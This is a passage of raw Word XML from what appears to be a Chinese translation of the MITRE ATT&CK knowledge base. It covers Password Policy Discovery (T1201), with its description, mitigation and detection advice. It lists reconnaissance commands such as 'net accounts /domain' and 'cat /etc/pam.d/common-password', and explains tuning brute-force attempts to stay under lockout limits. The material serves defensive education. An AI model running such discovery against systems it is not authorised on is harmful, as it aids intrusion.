      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的正常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>良性系统和网络事件可能不常见，具体取决于环境及其使用方式。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控进程和命令行参数来查看是否有收集</w:t>
      </w:r>
      <w:r>
        <w:t>系统和网络信息的行为。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>可能会使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置功能的远程访问工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以收集</w:t>
      </w:r>
      <w:r>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也</w:t>
      </w:r>
      <w:r>
        <w:t>可能会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理工具（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6DD3B3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>策略发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="541683F5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C5F615A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> T1201</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7226A60A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>发现</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBCC0A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> Windows, Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17377341" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="454D3B03" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EDDB6FC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00830953" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t>: Sudhanshu Chauhan, @Sudhanshu_C</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC1B3AB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00830953">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00830953">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7ED129DD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00093AE2" w:rsidRDefault="00A0413E" w:rsidP="00A0413E"/>
    <w:p w14:paraId="393FF7A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络密码策略是一种强制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难以猜测或通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00B063B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难以破译</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的复杂密码的方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试访问有关企业网络中使用的密码策略的详细信息。这将有助于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个公共密码列表并启动符合策略的字典和</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或暴力攻击（例如，如果最小密码长度应为</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则不要尝试例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'pass123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的密码；</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锁定设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则每个帐户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试不</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>超过</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-4</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个密码，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防止</w:t>
      </w:r>
      <w:r w:rsidRPr="0080750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帐户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被锁定）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660C7897" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以</w:t>
      </w:r>
      <w:r w:rsidRPr="003464AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置和发现密码策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B182B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185ADEE6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7125D6A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net accounts /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A887E1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03719A09" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>chage -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382EEFD6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>cat /etc/pam.d/common-password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3B0CB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37924399" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00012EFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>pwpolicy getaccountpolicies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01381522" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1358"/>
        <w:gridCol w:w="8378"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="3E176608" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5F8F76F1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8067" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1DD2E13B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="1BB09CAA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1669" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22B21354" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId175" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>密码策略</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249C4FDD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保仅注册有效的密码过滤器。筛选器</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DLL</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>必须存在于域控制器和</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或本地计算机的</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安装目录（默认为</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>C:\Windows\System32\</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），并且在</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</w:t>
            </w:r>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中具有相应条目。</w:t>
            </w:r>
            <w:hyperlink r:id="rId176" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>[7]</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6176F541" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BABB41A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
      </w:pPr>
      <w:r w:rsidRPr="00C31F9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视工具和命令行参数的进程，这些参数可能表明它们正用于密码策略发现。将该活动与来自原始系统的其他可疑活动相关联，以减少有效用户或管理员活动的潜在误报。攻击者可能会尝试在操作的早期找到密码策略，并且该活动很可能与其他发现活动一起发生。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75291C17" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4527859B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>周边设备</w:t>
      </w:r>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
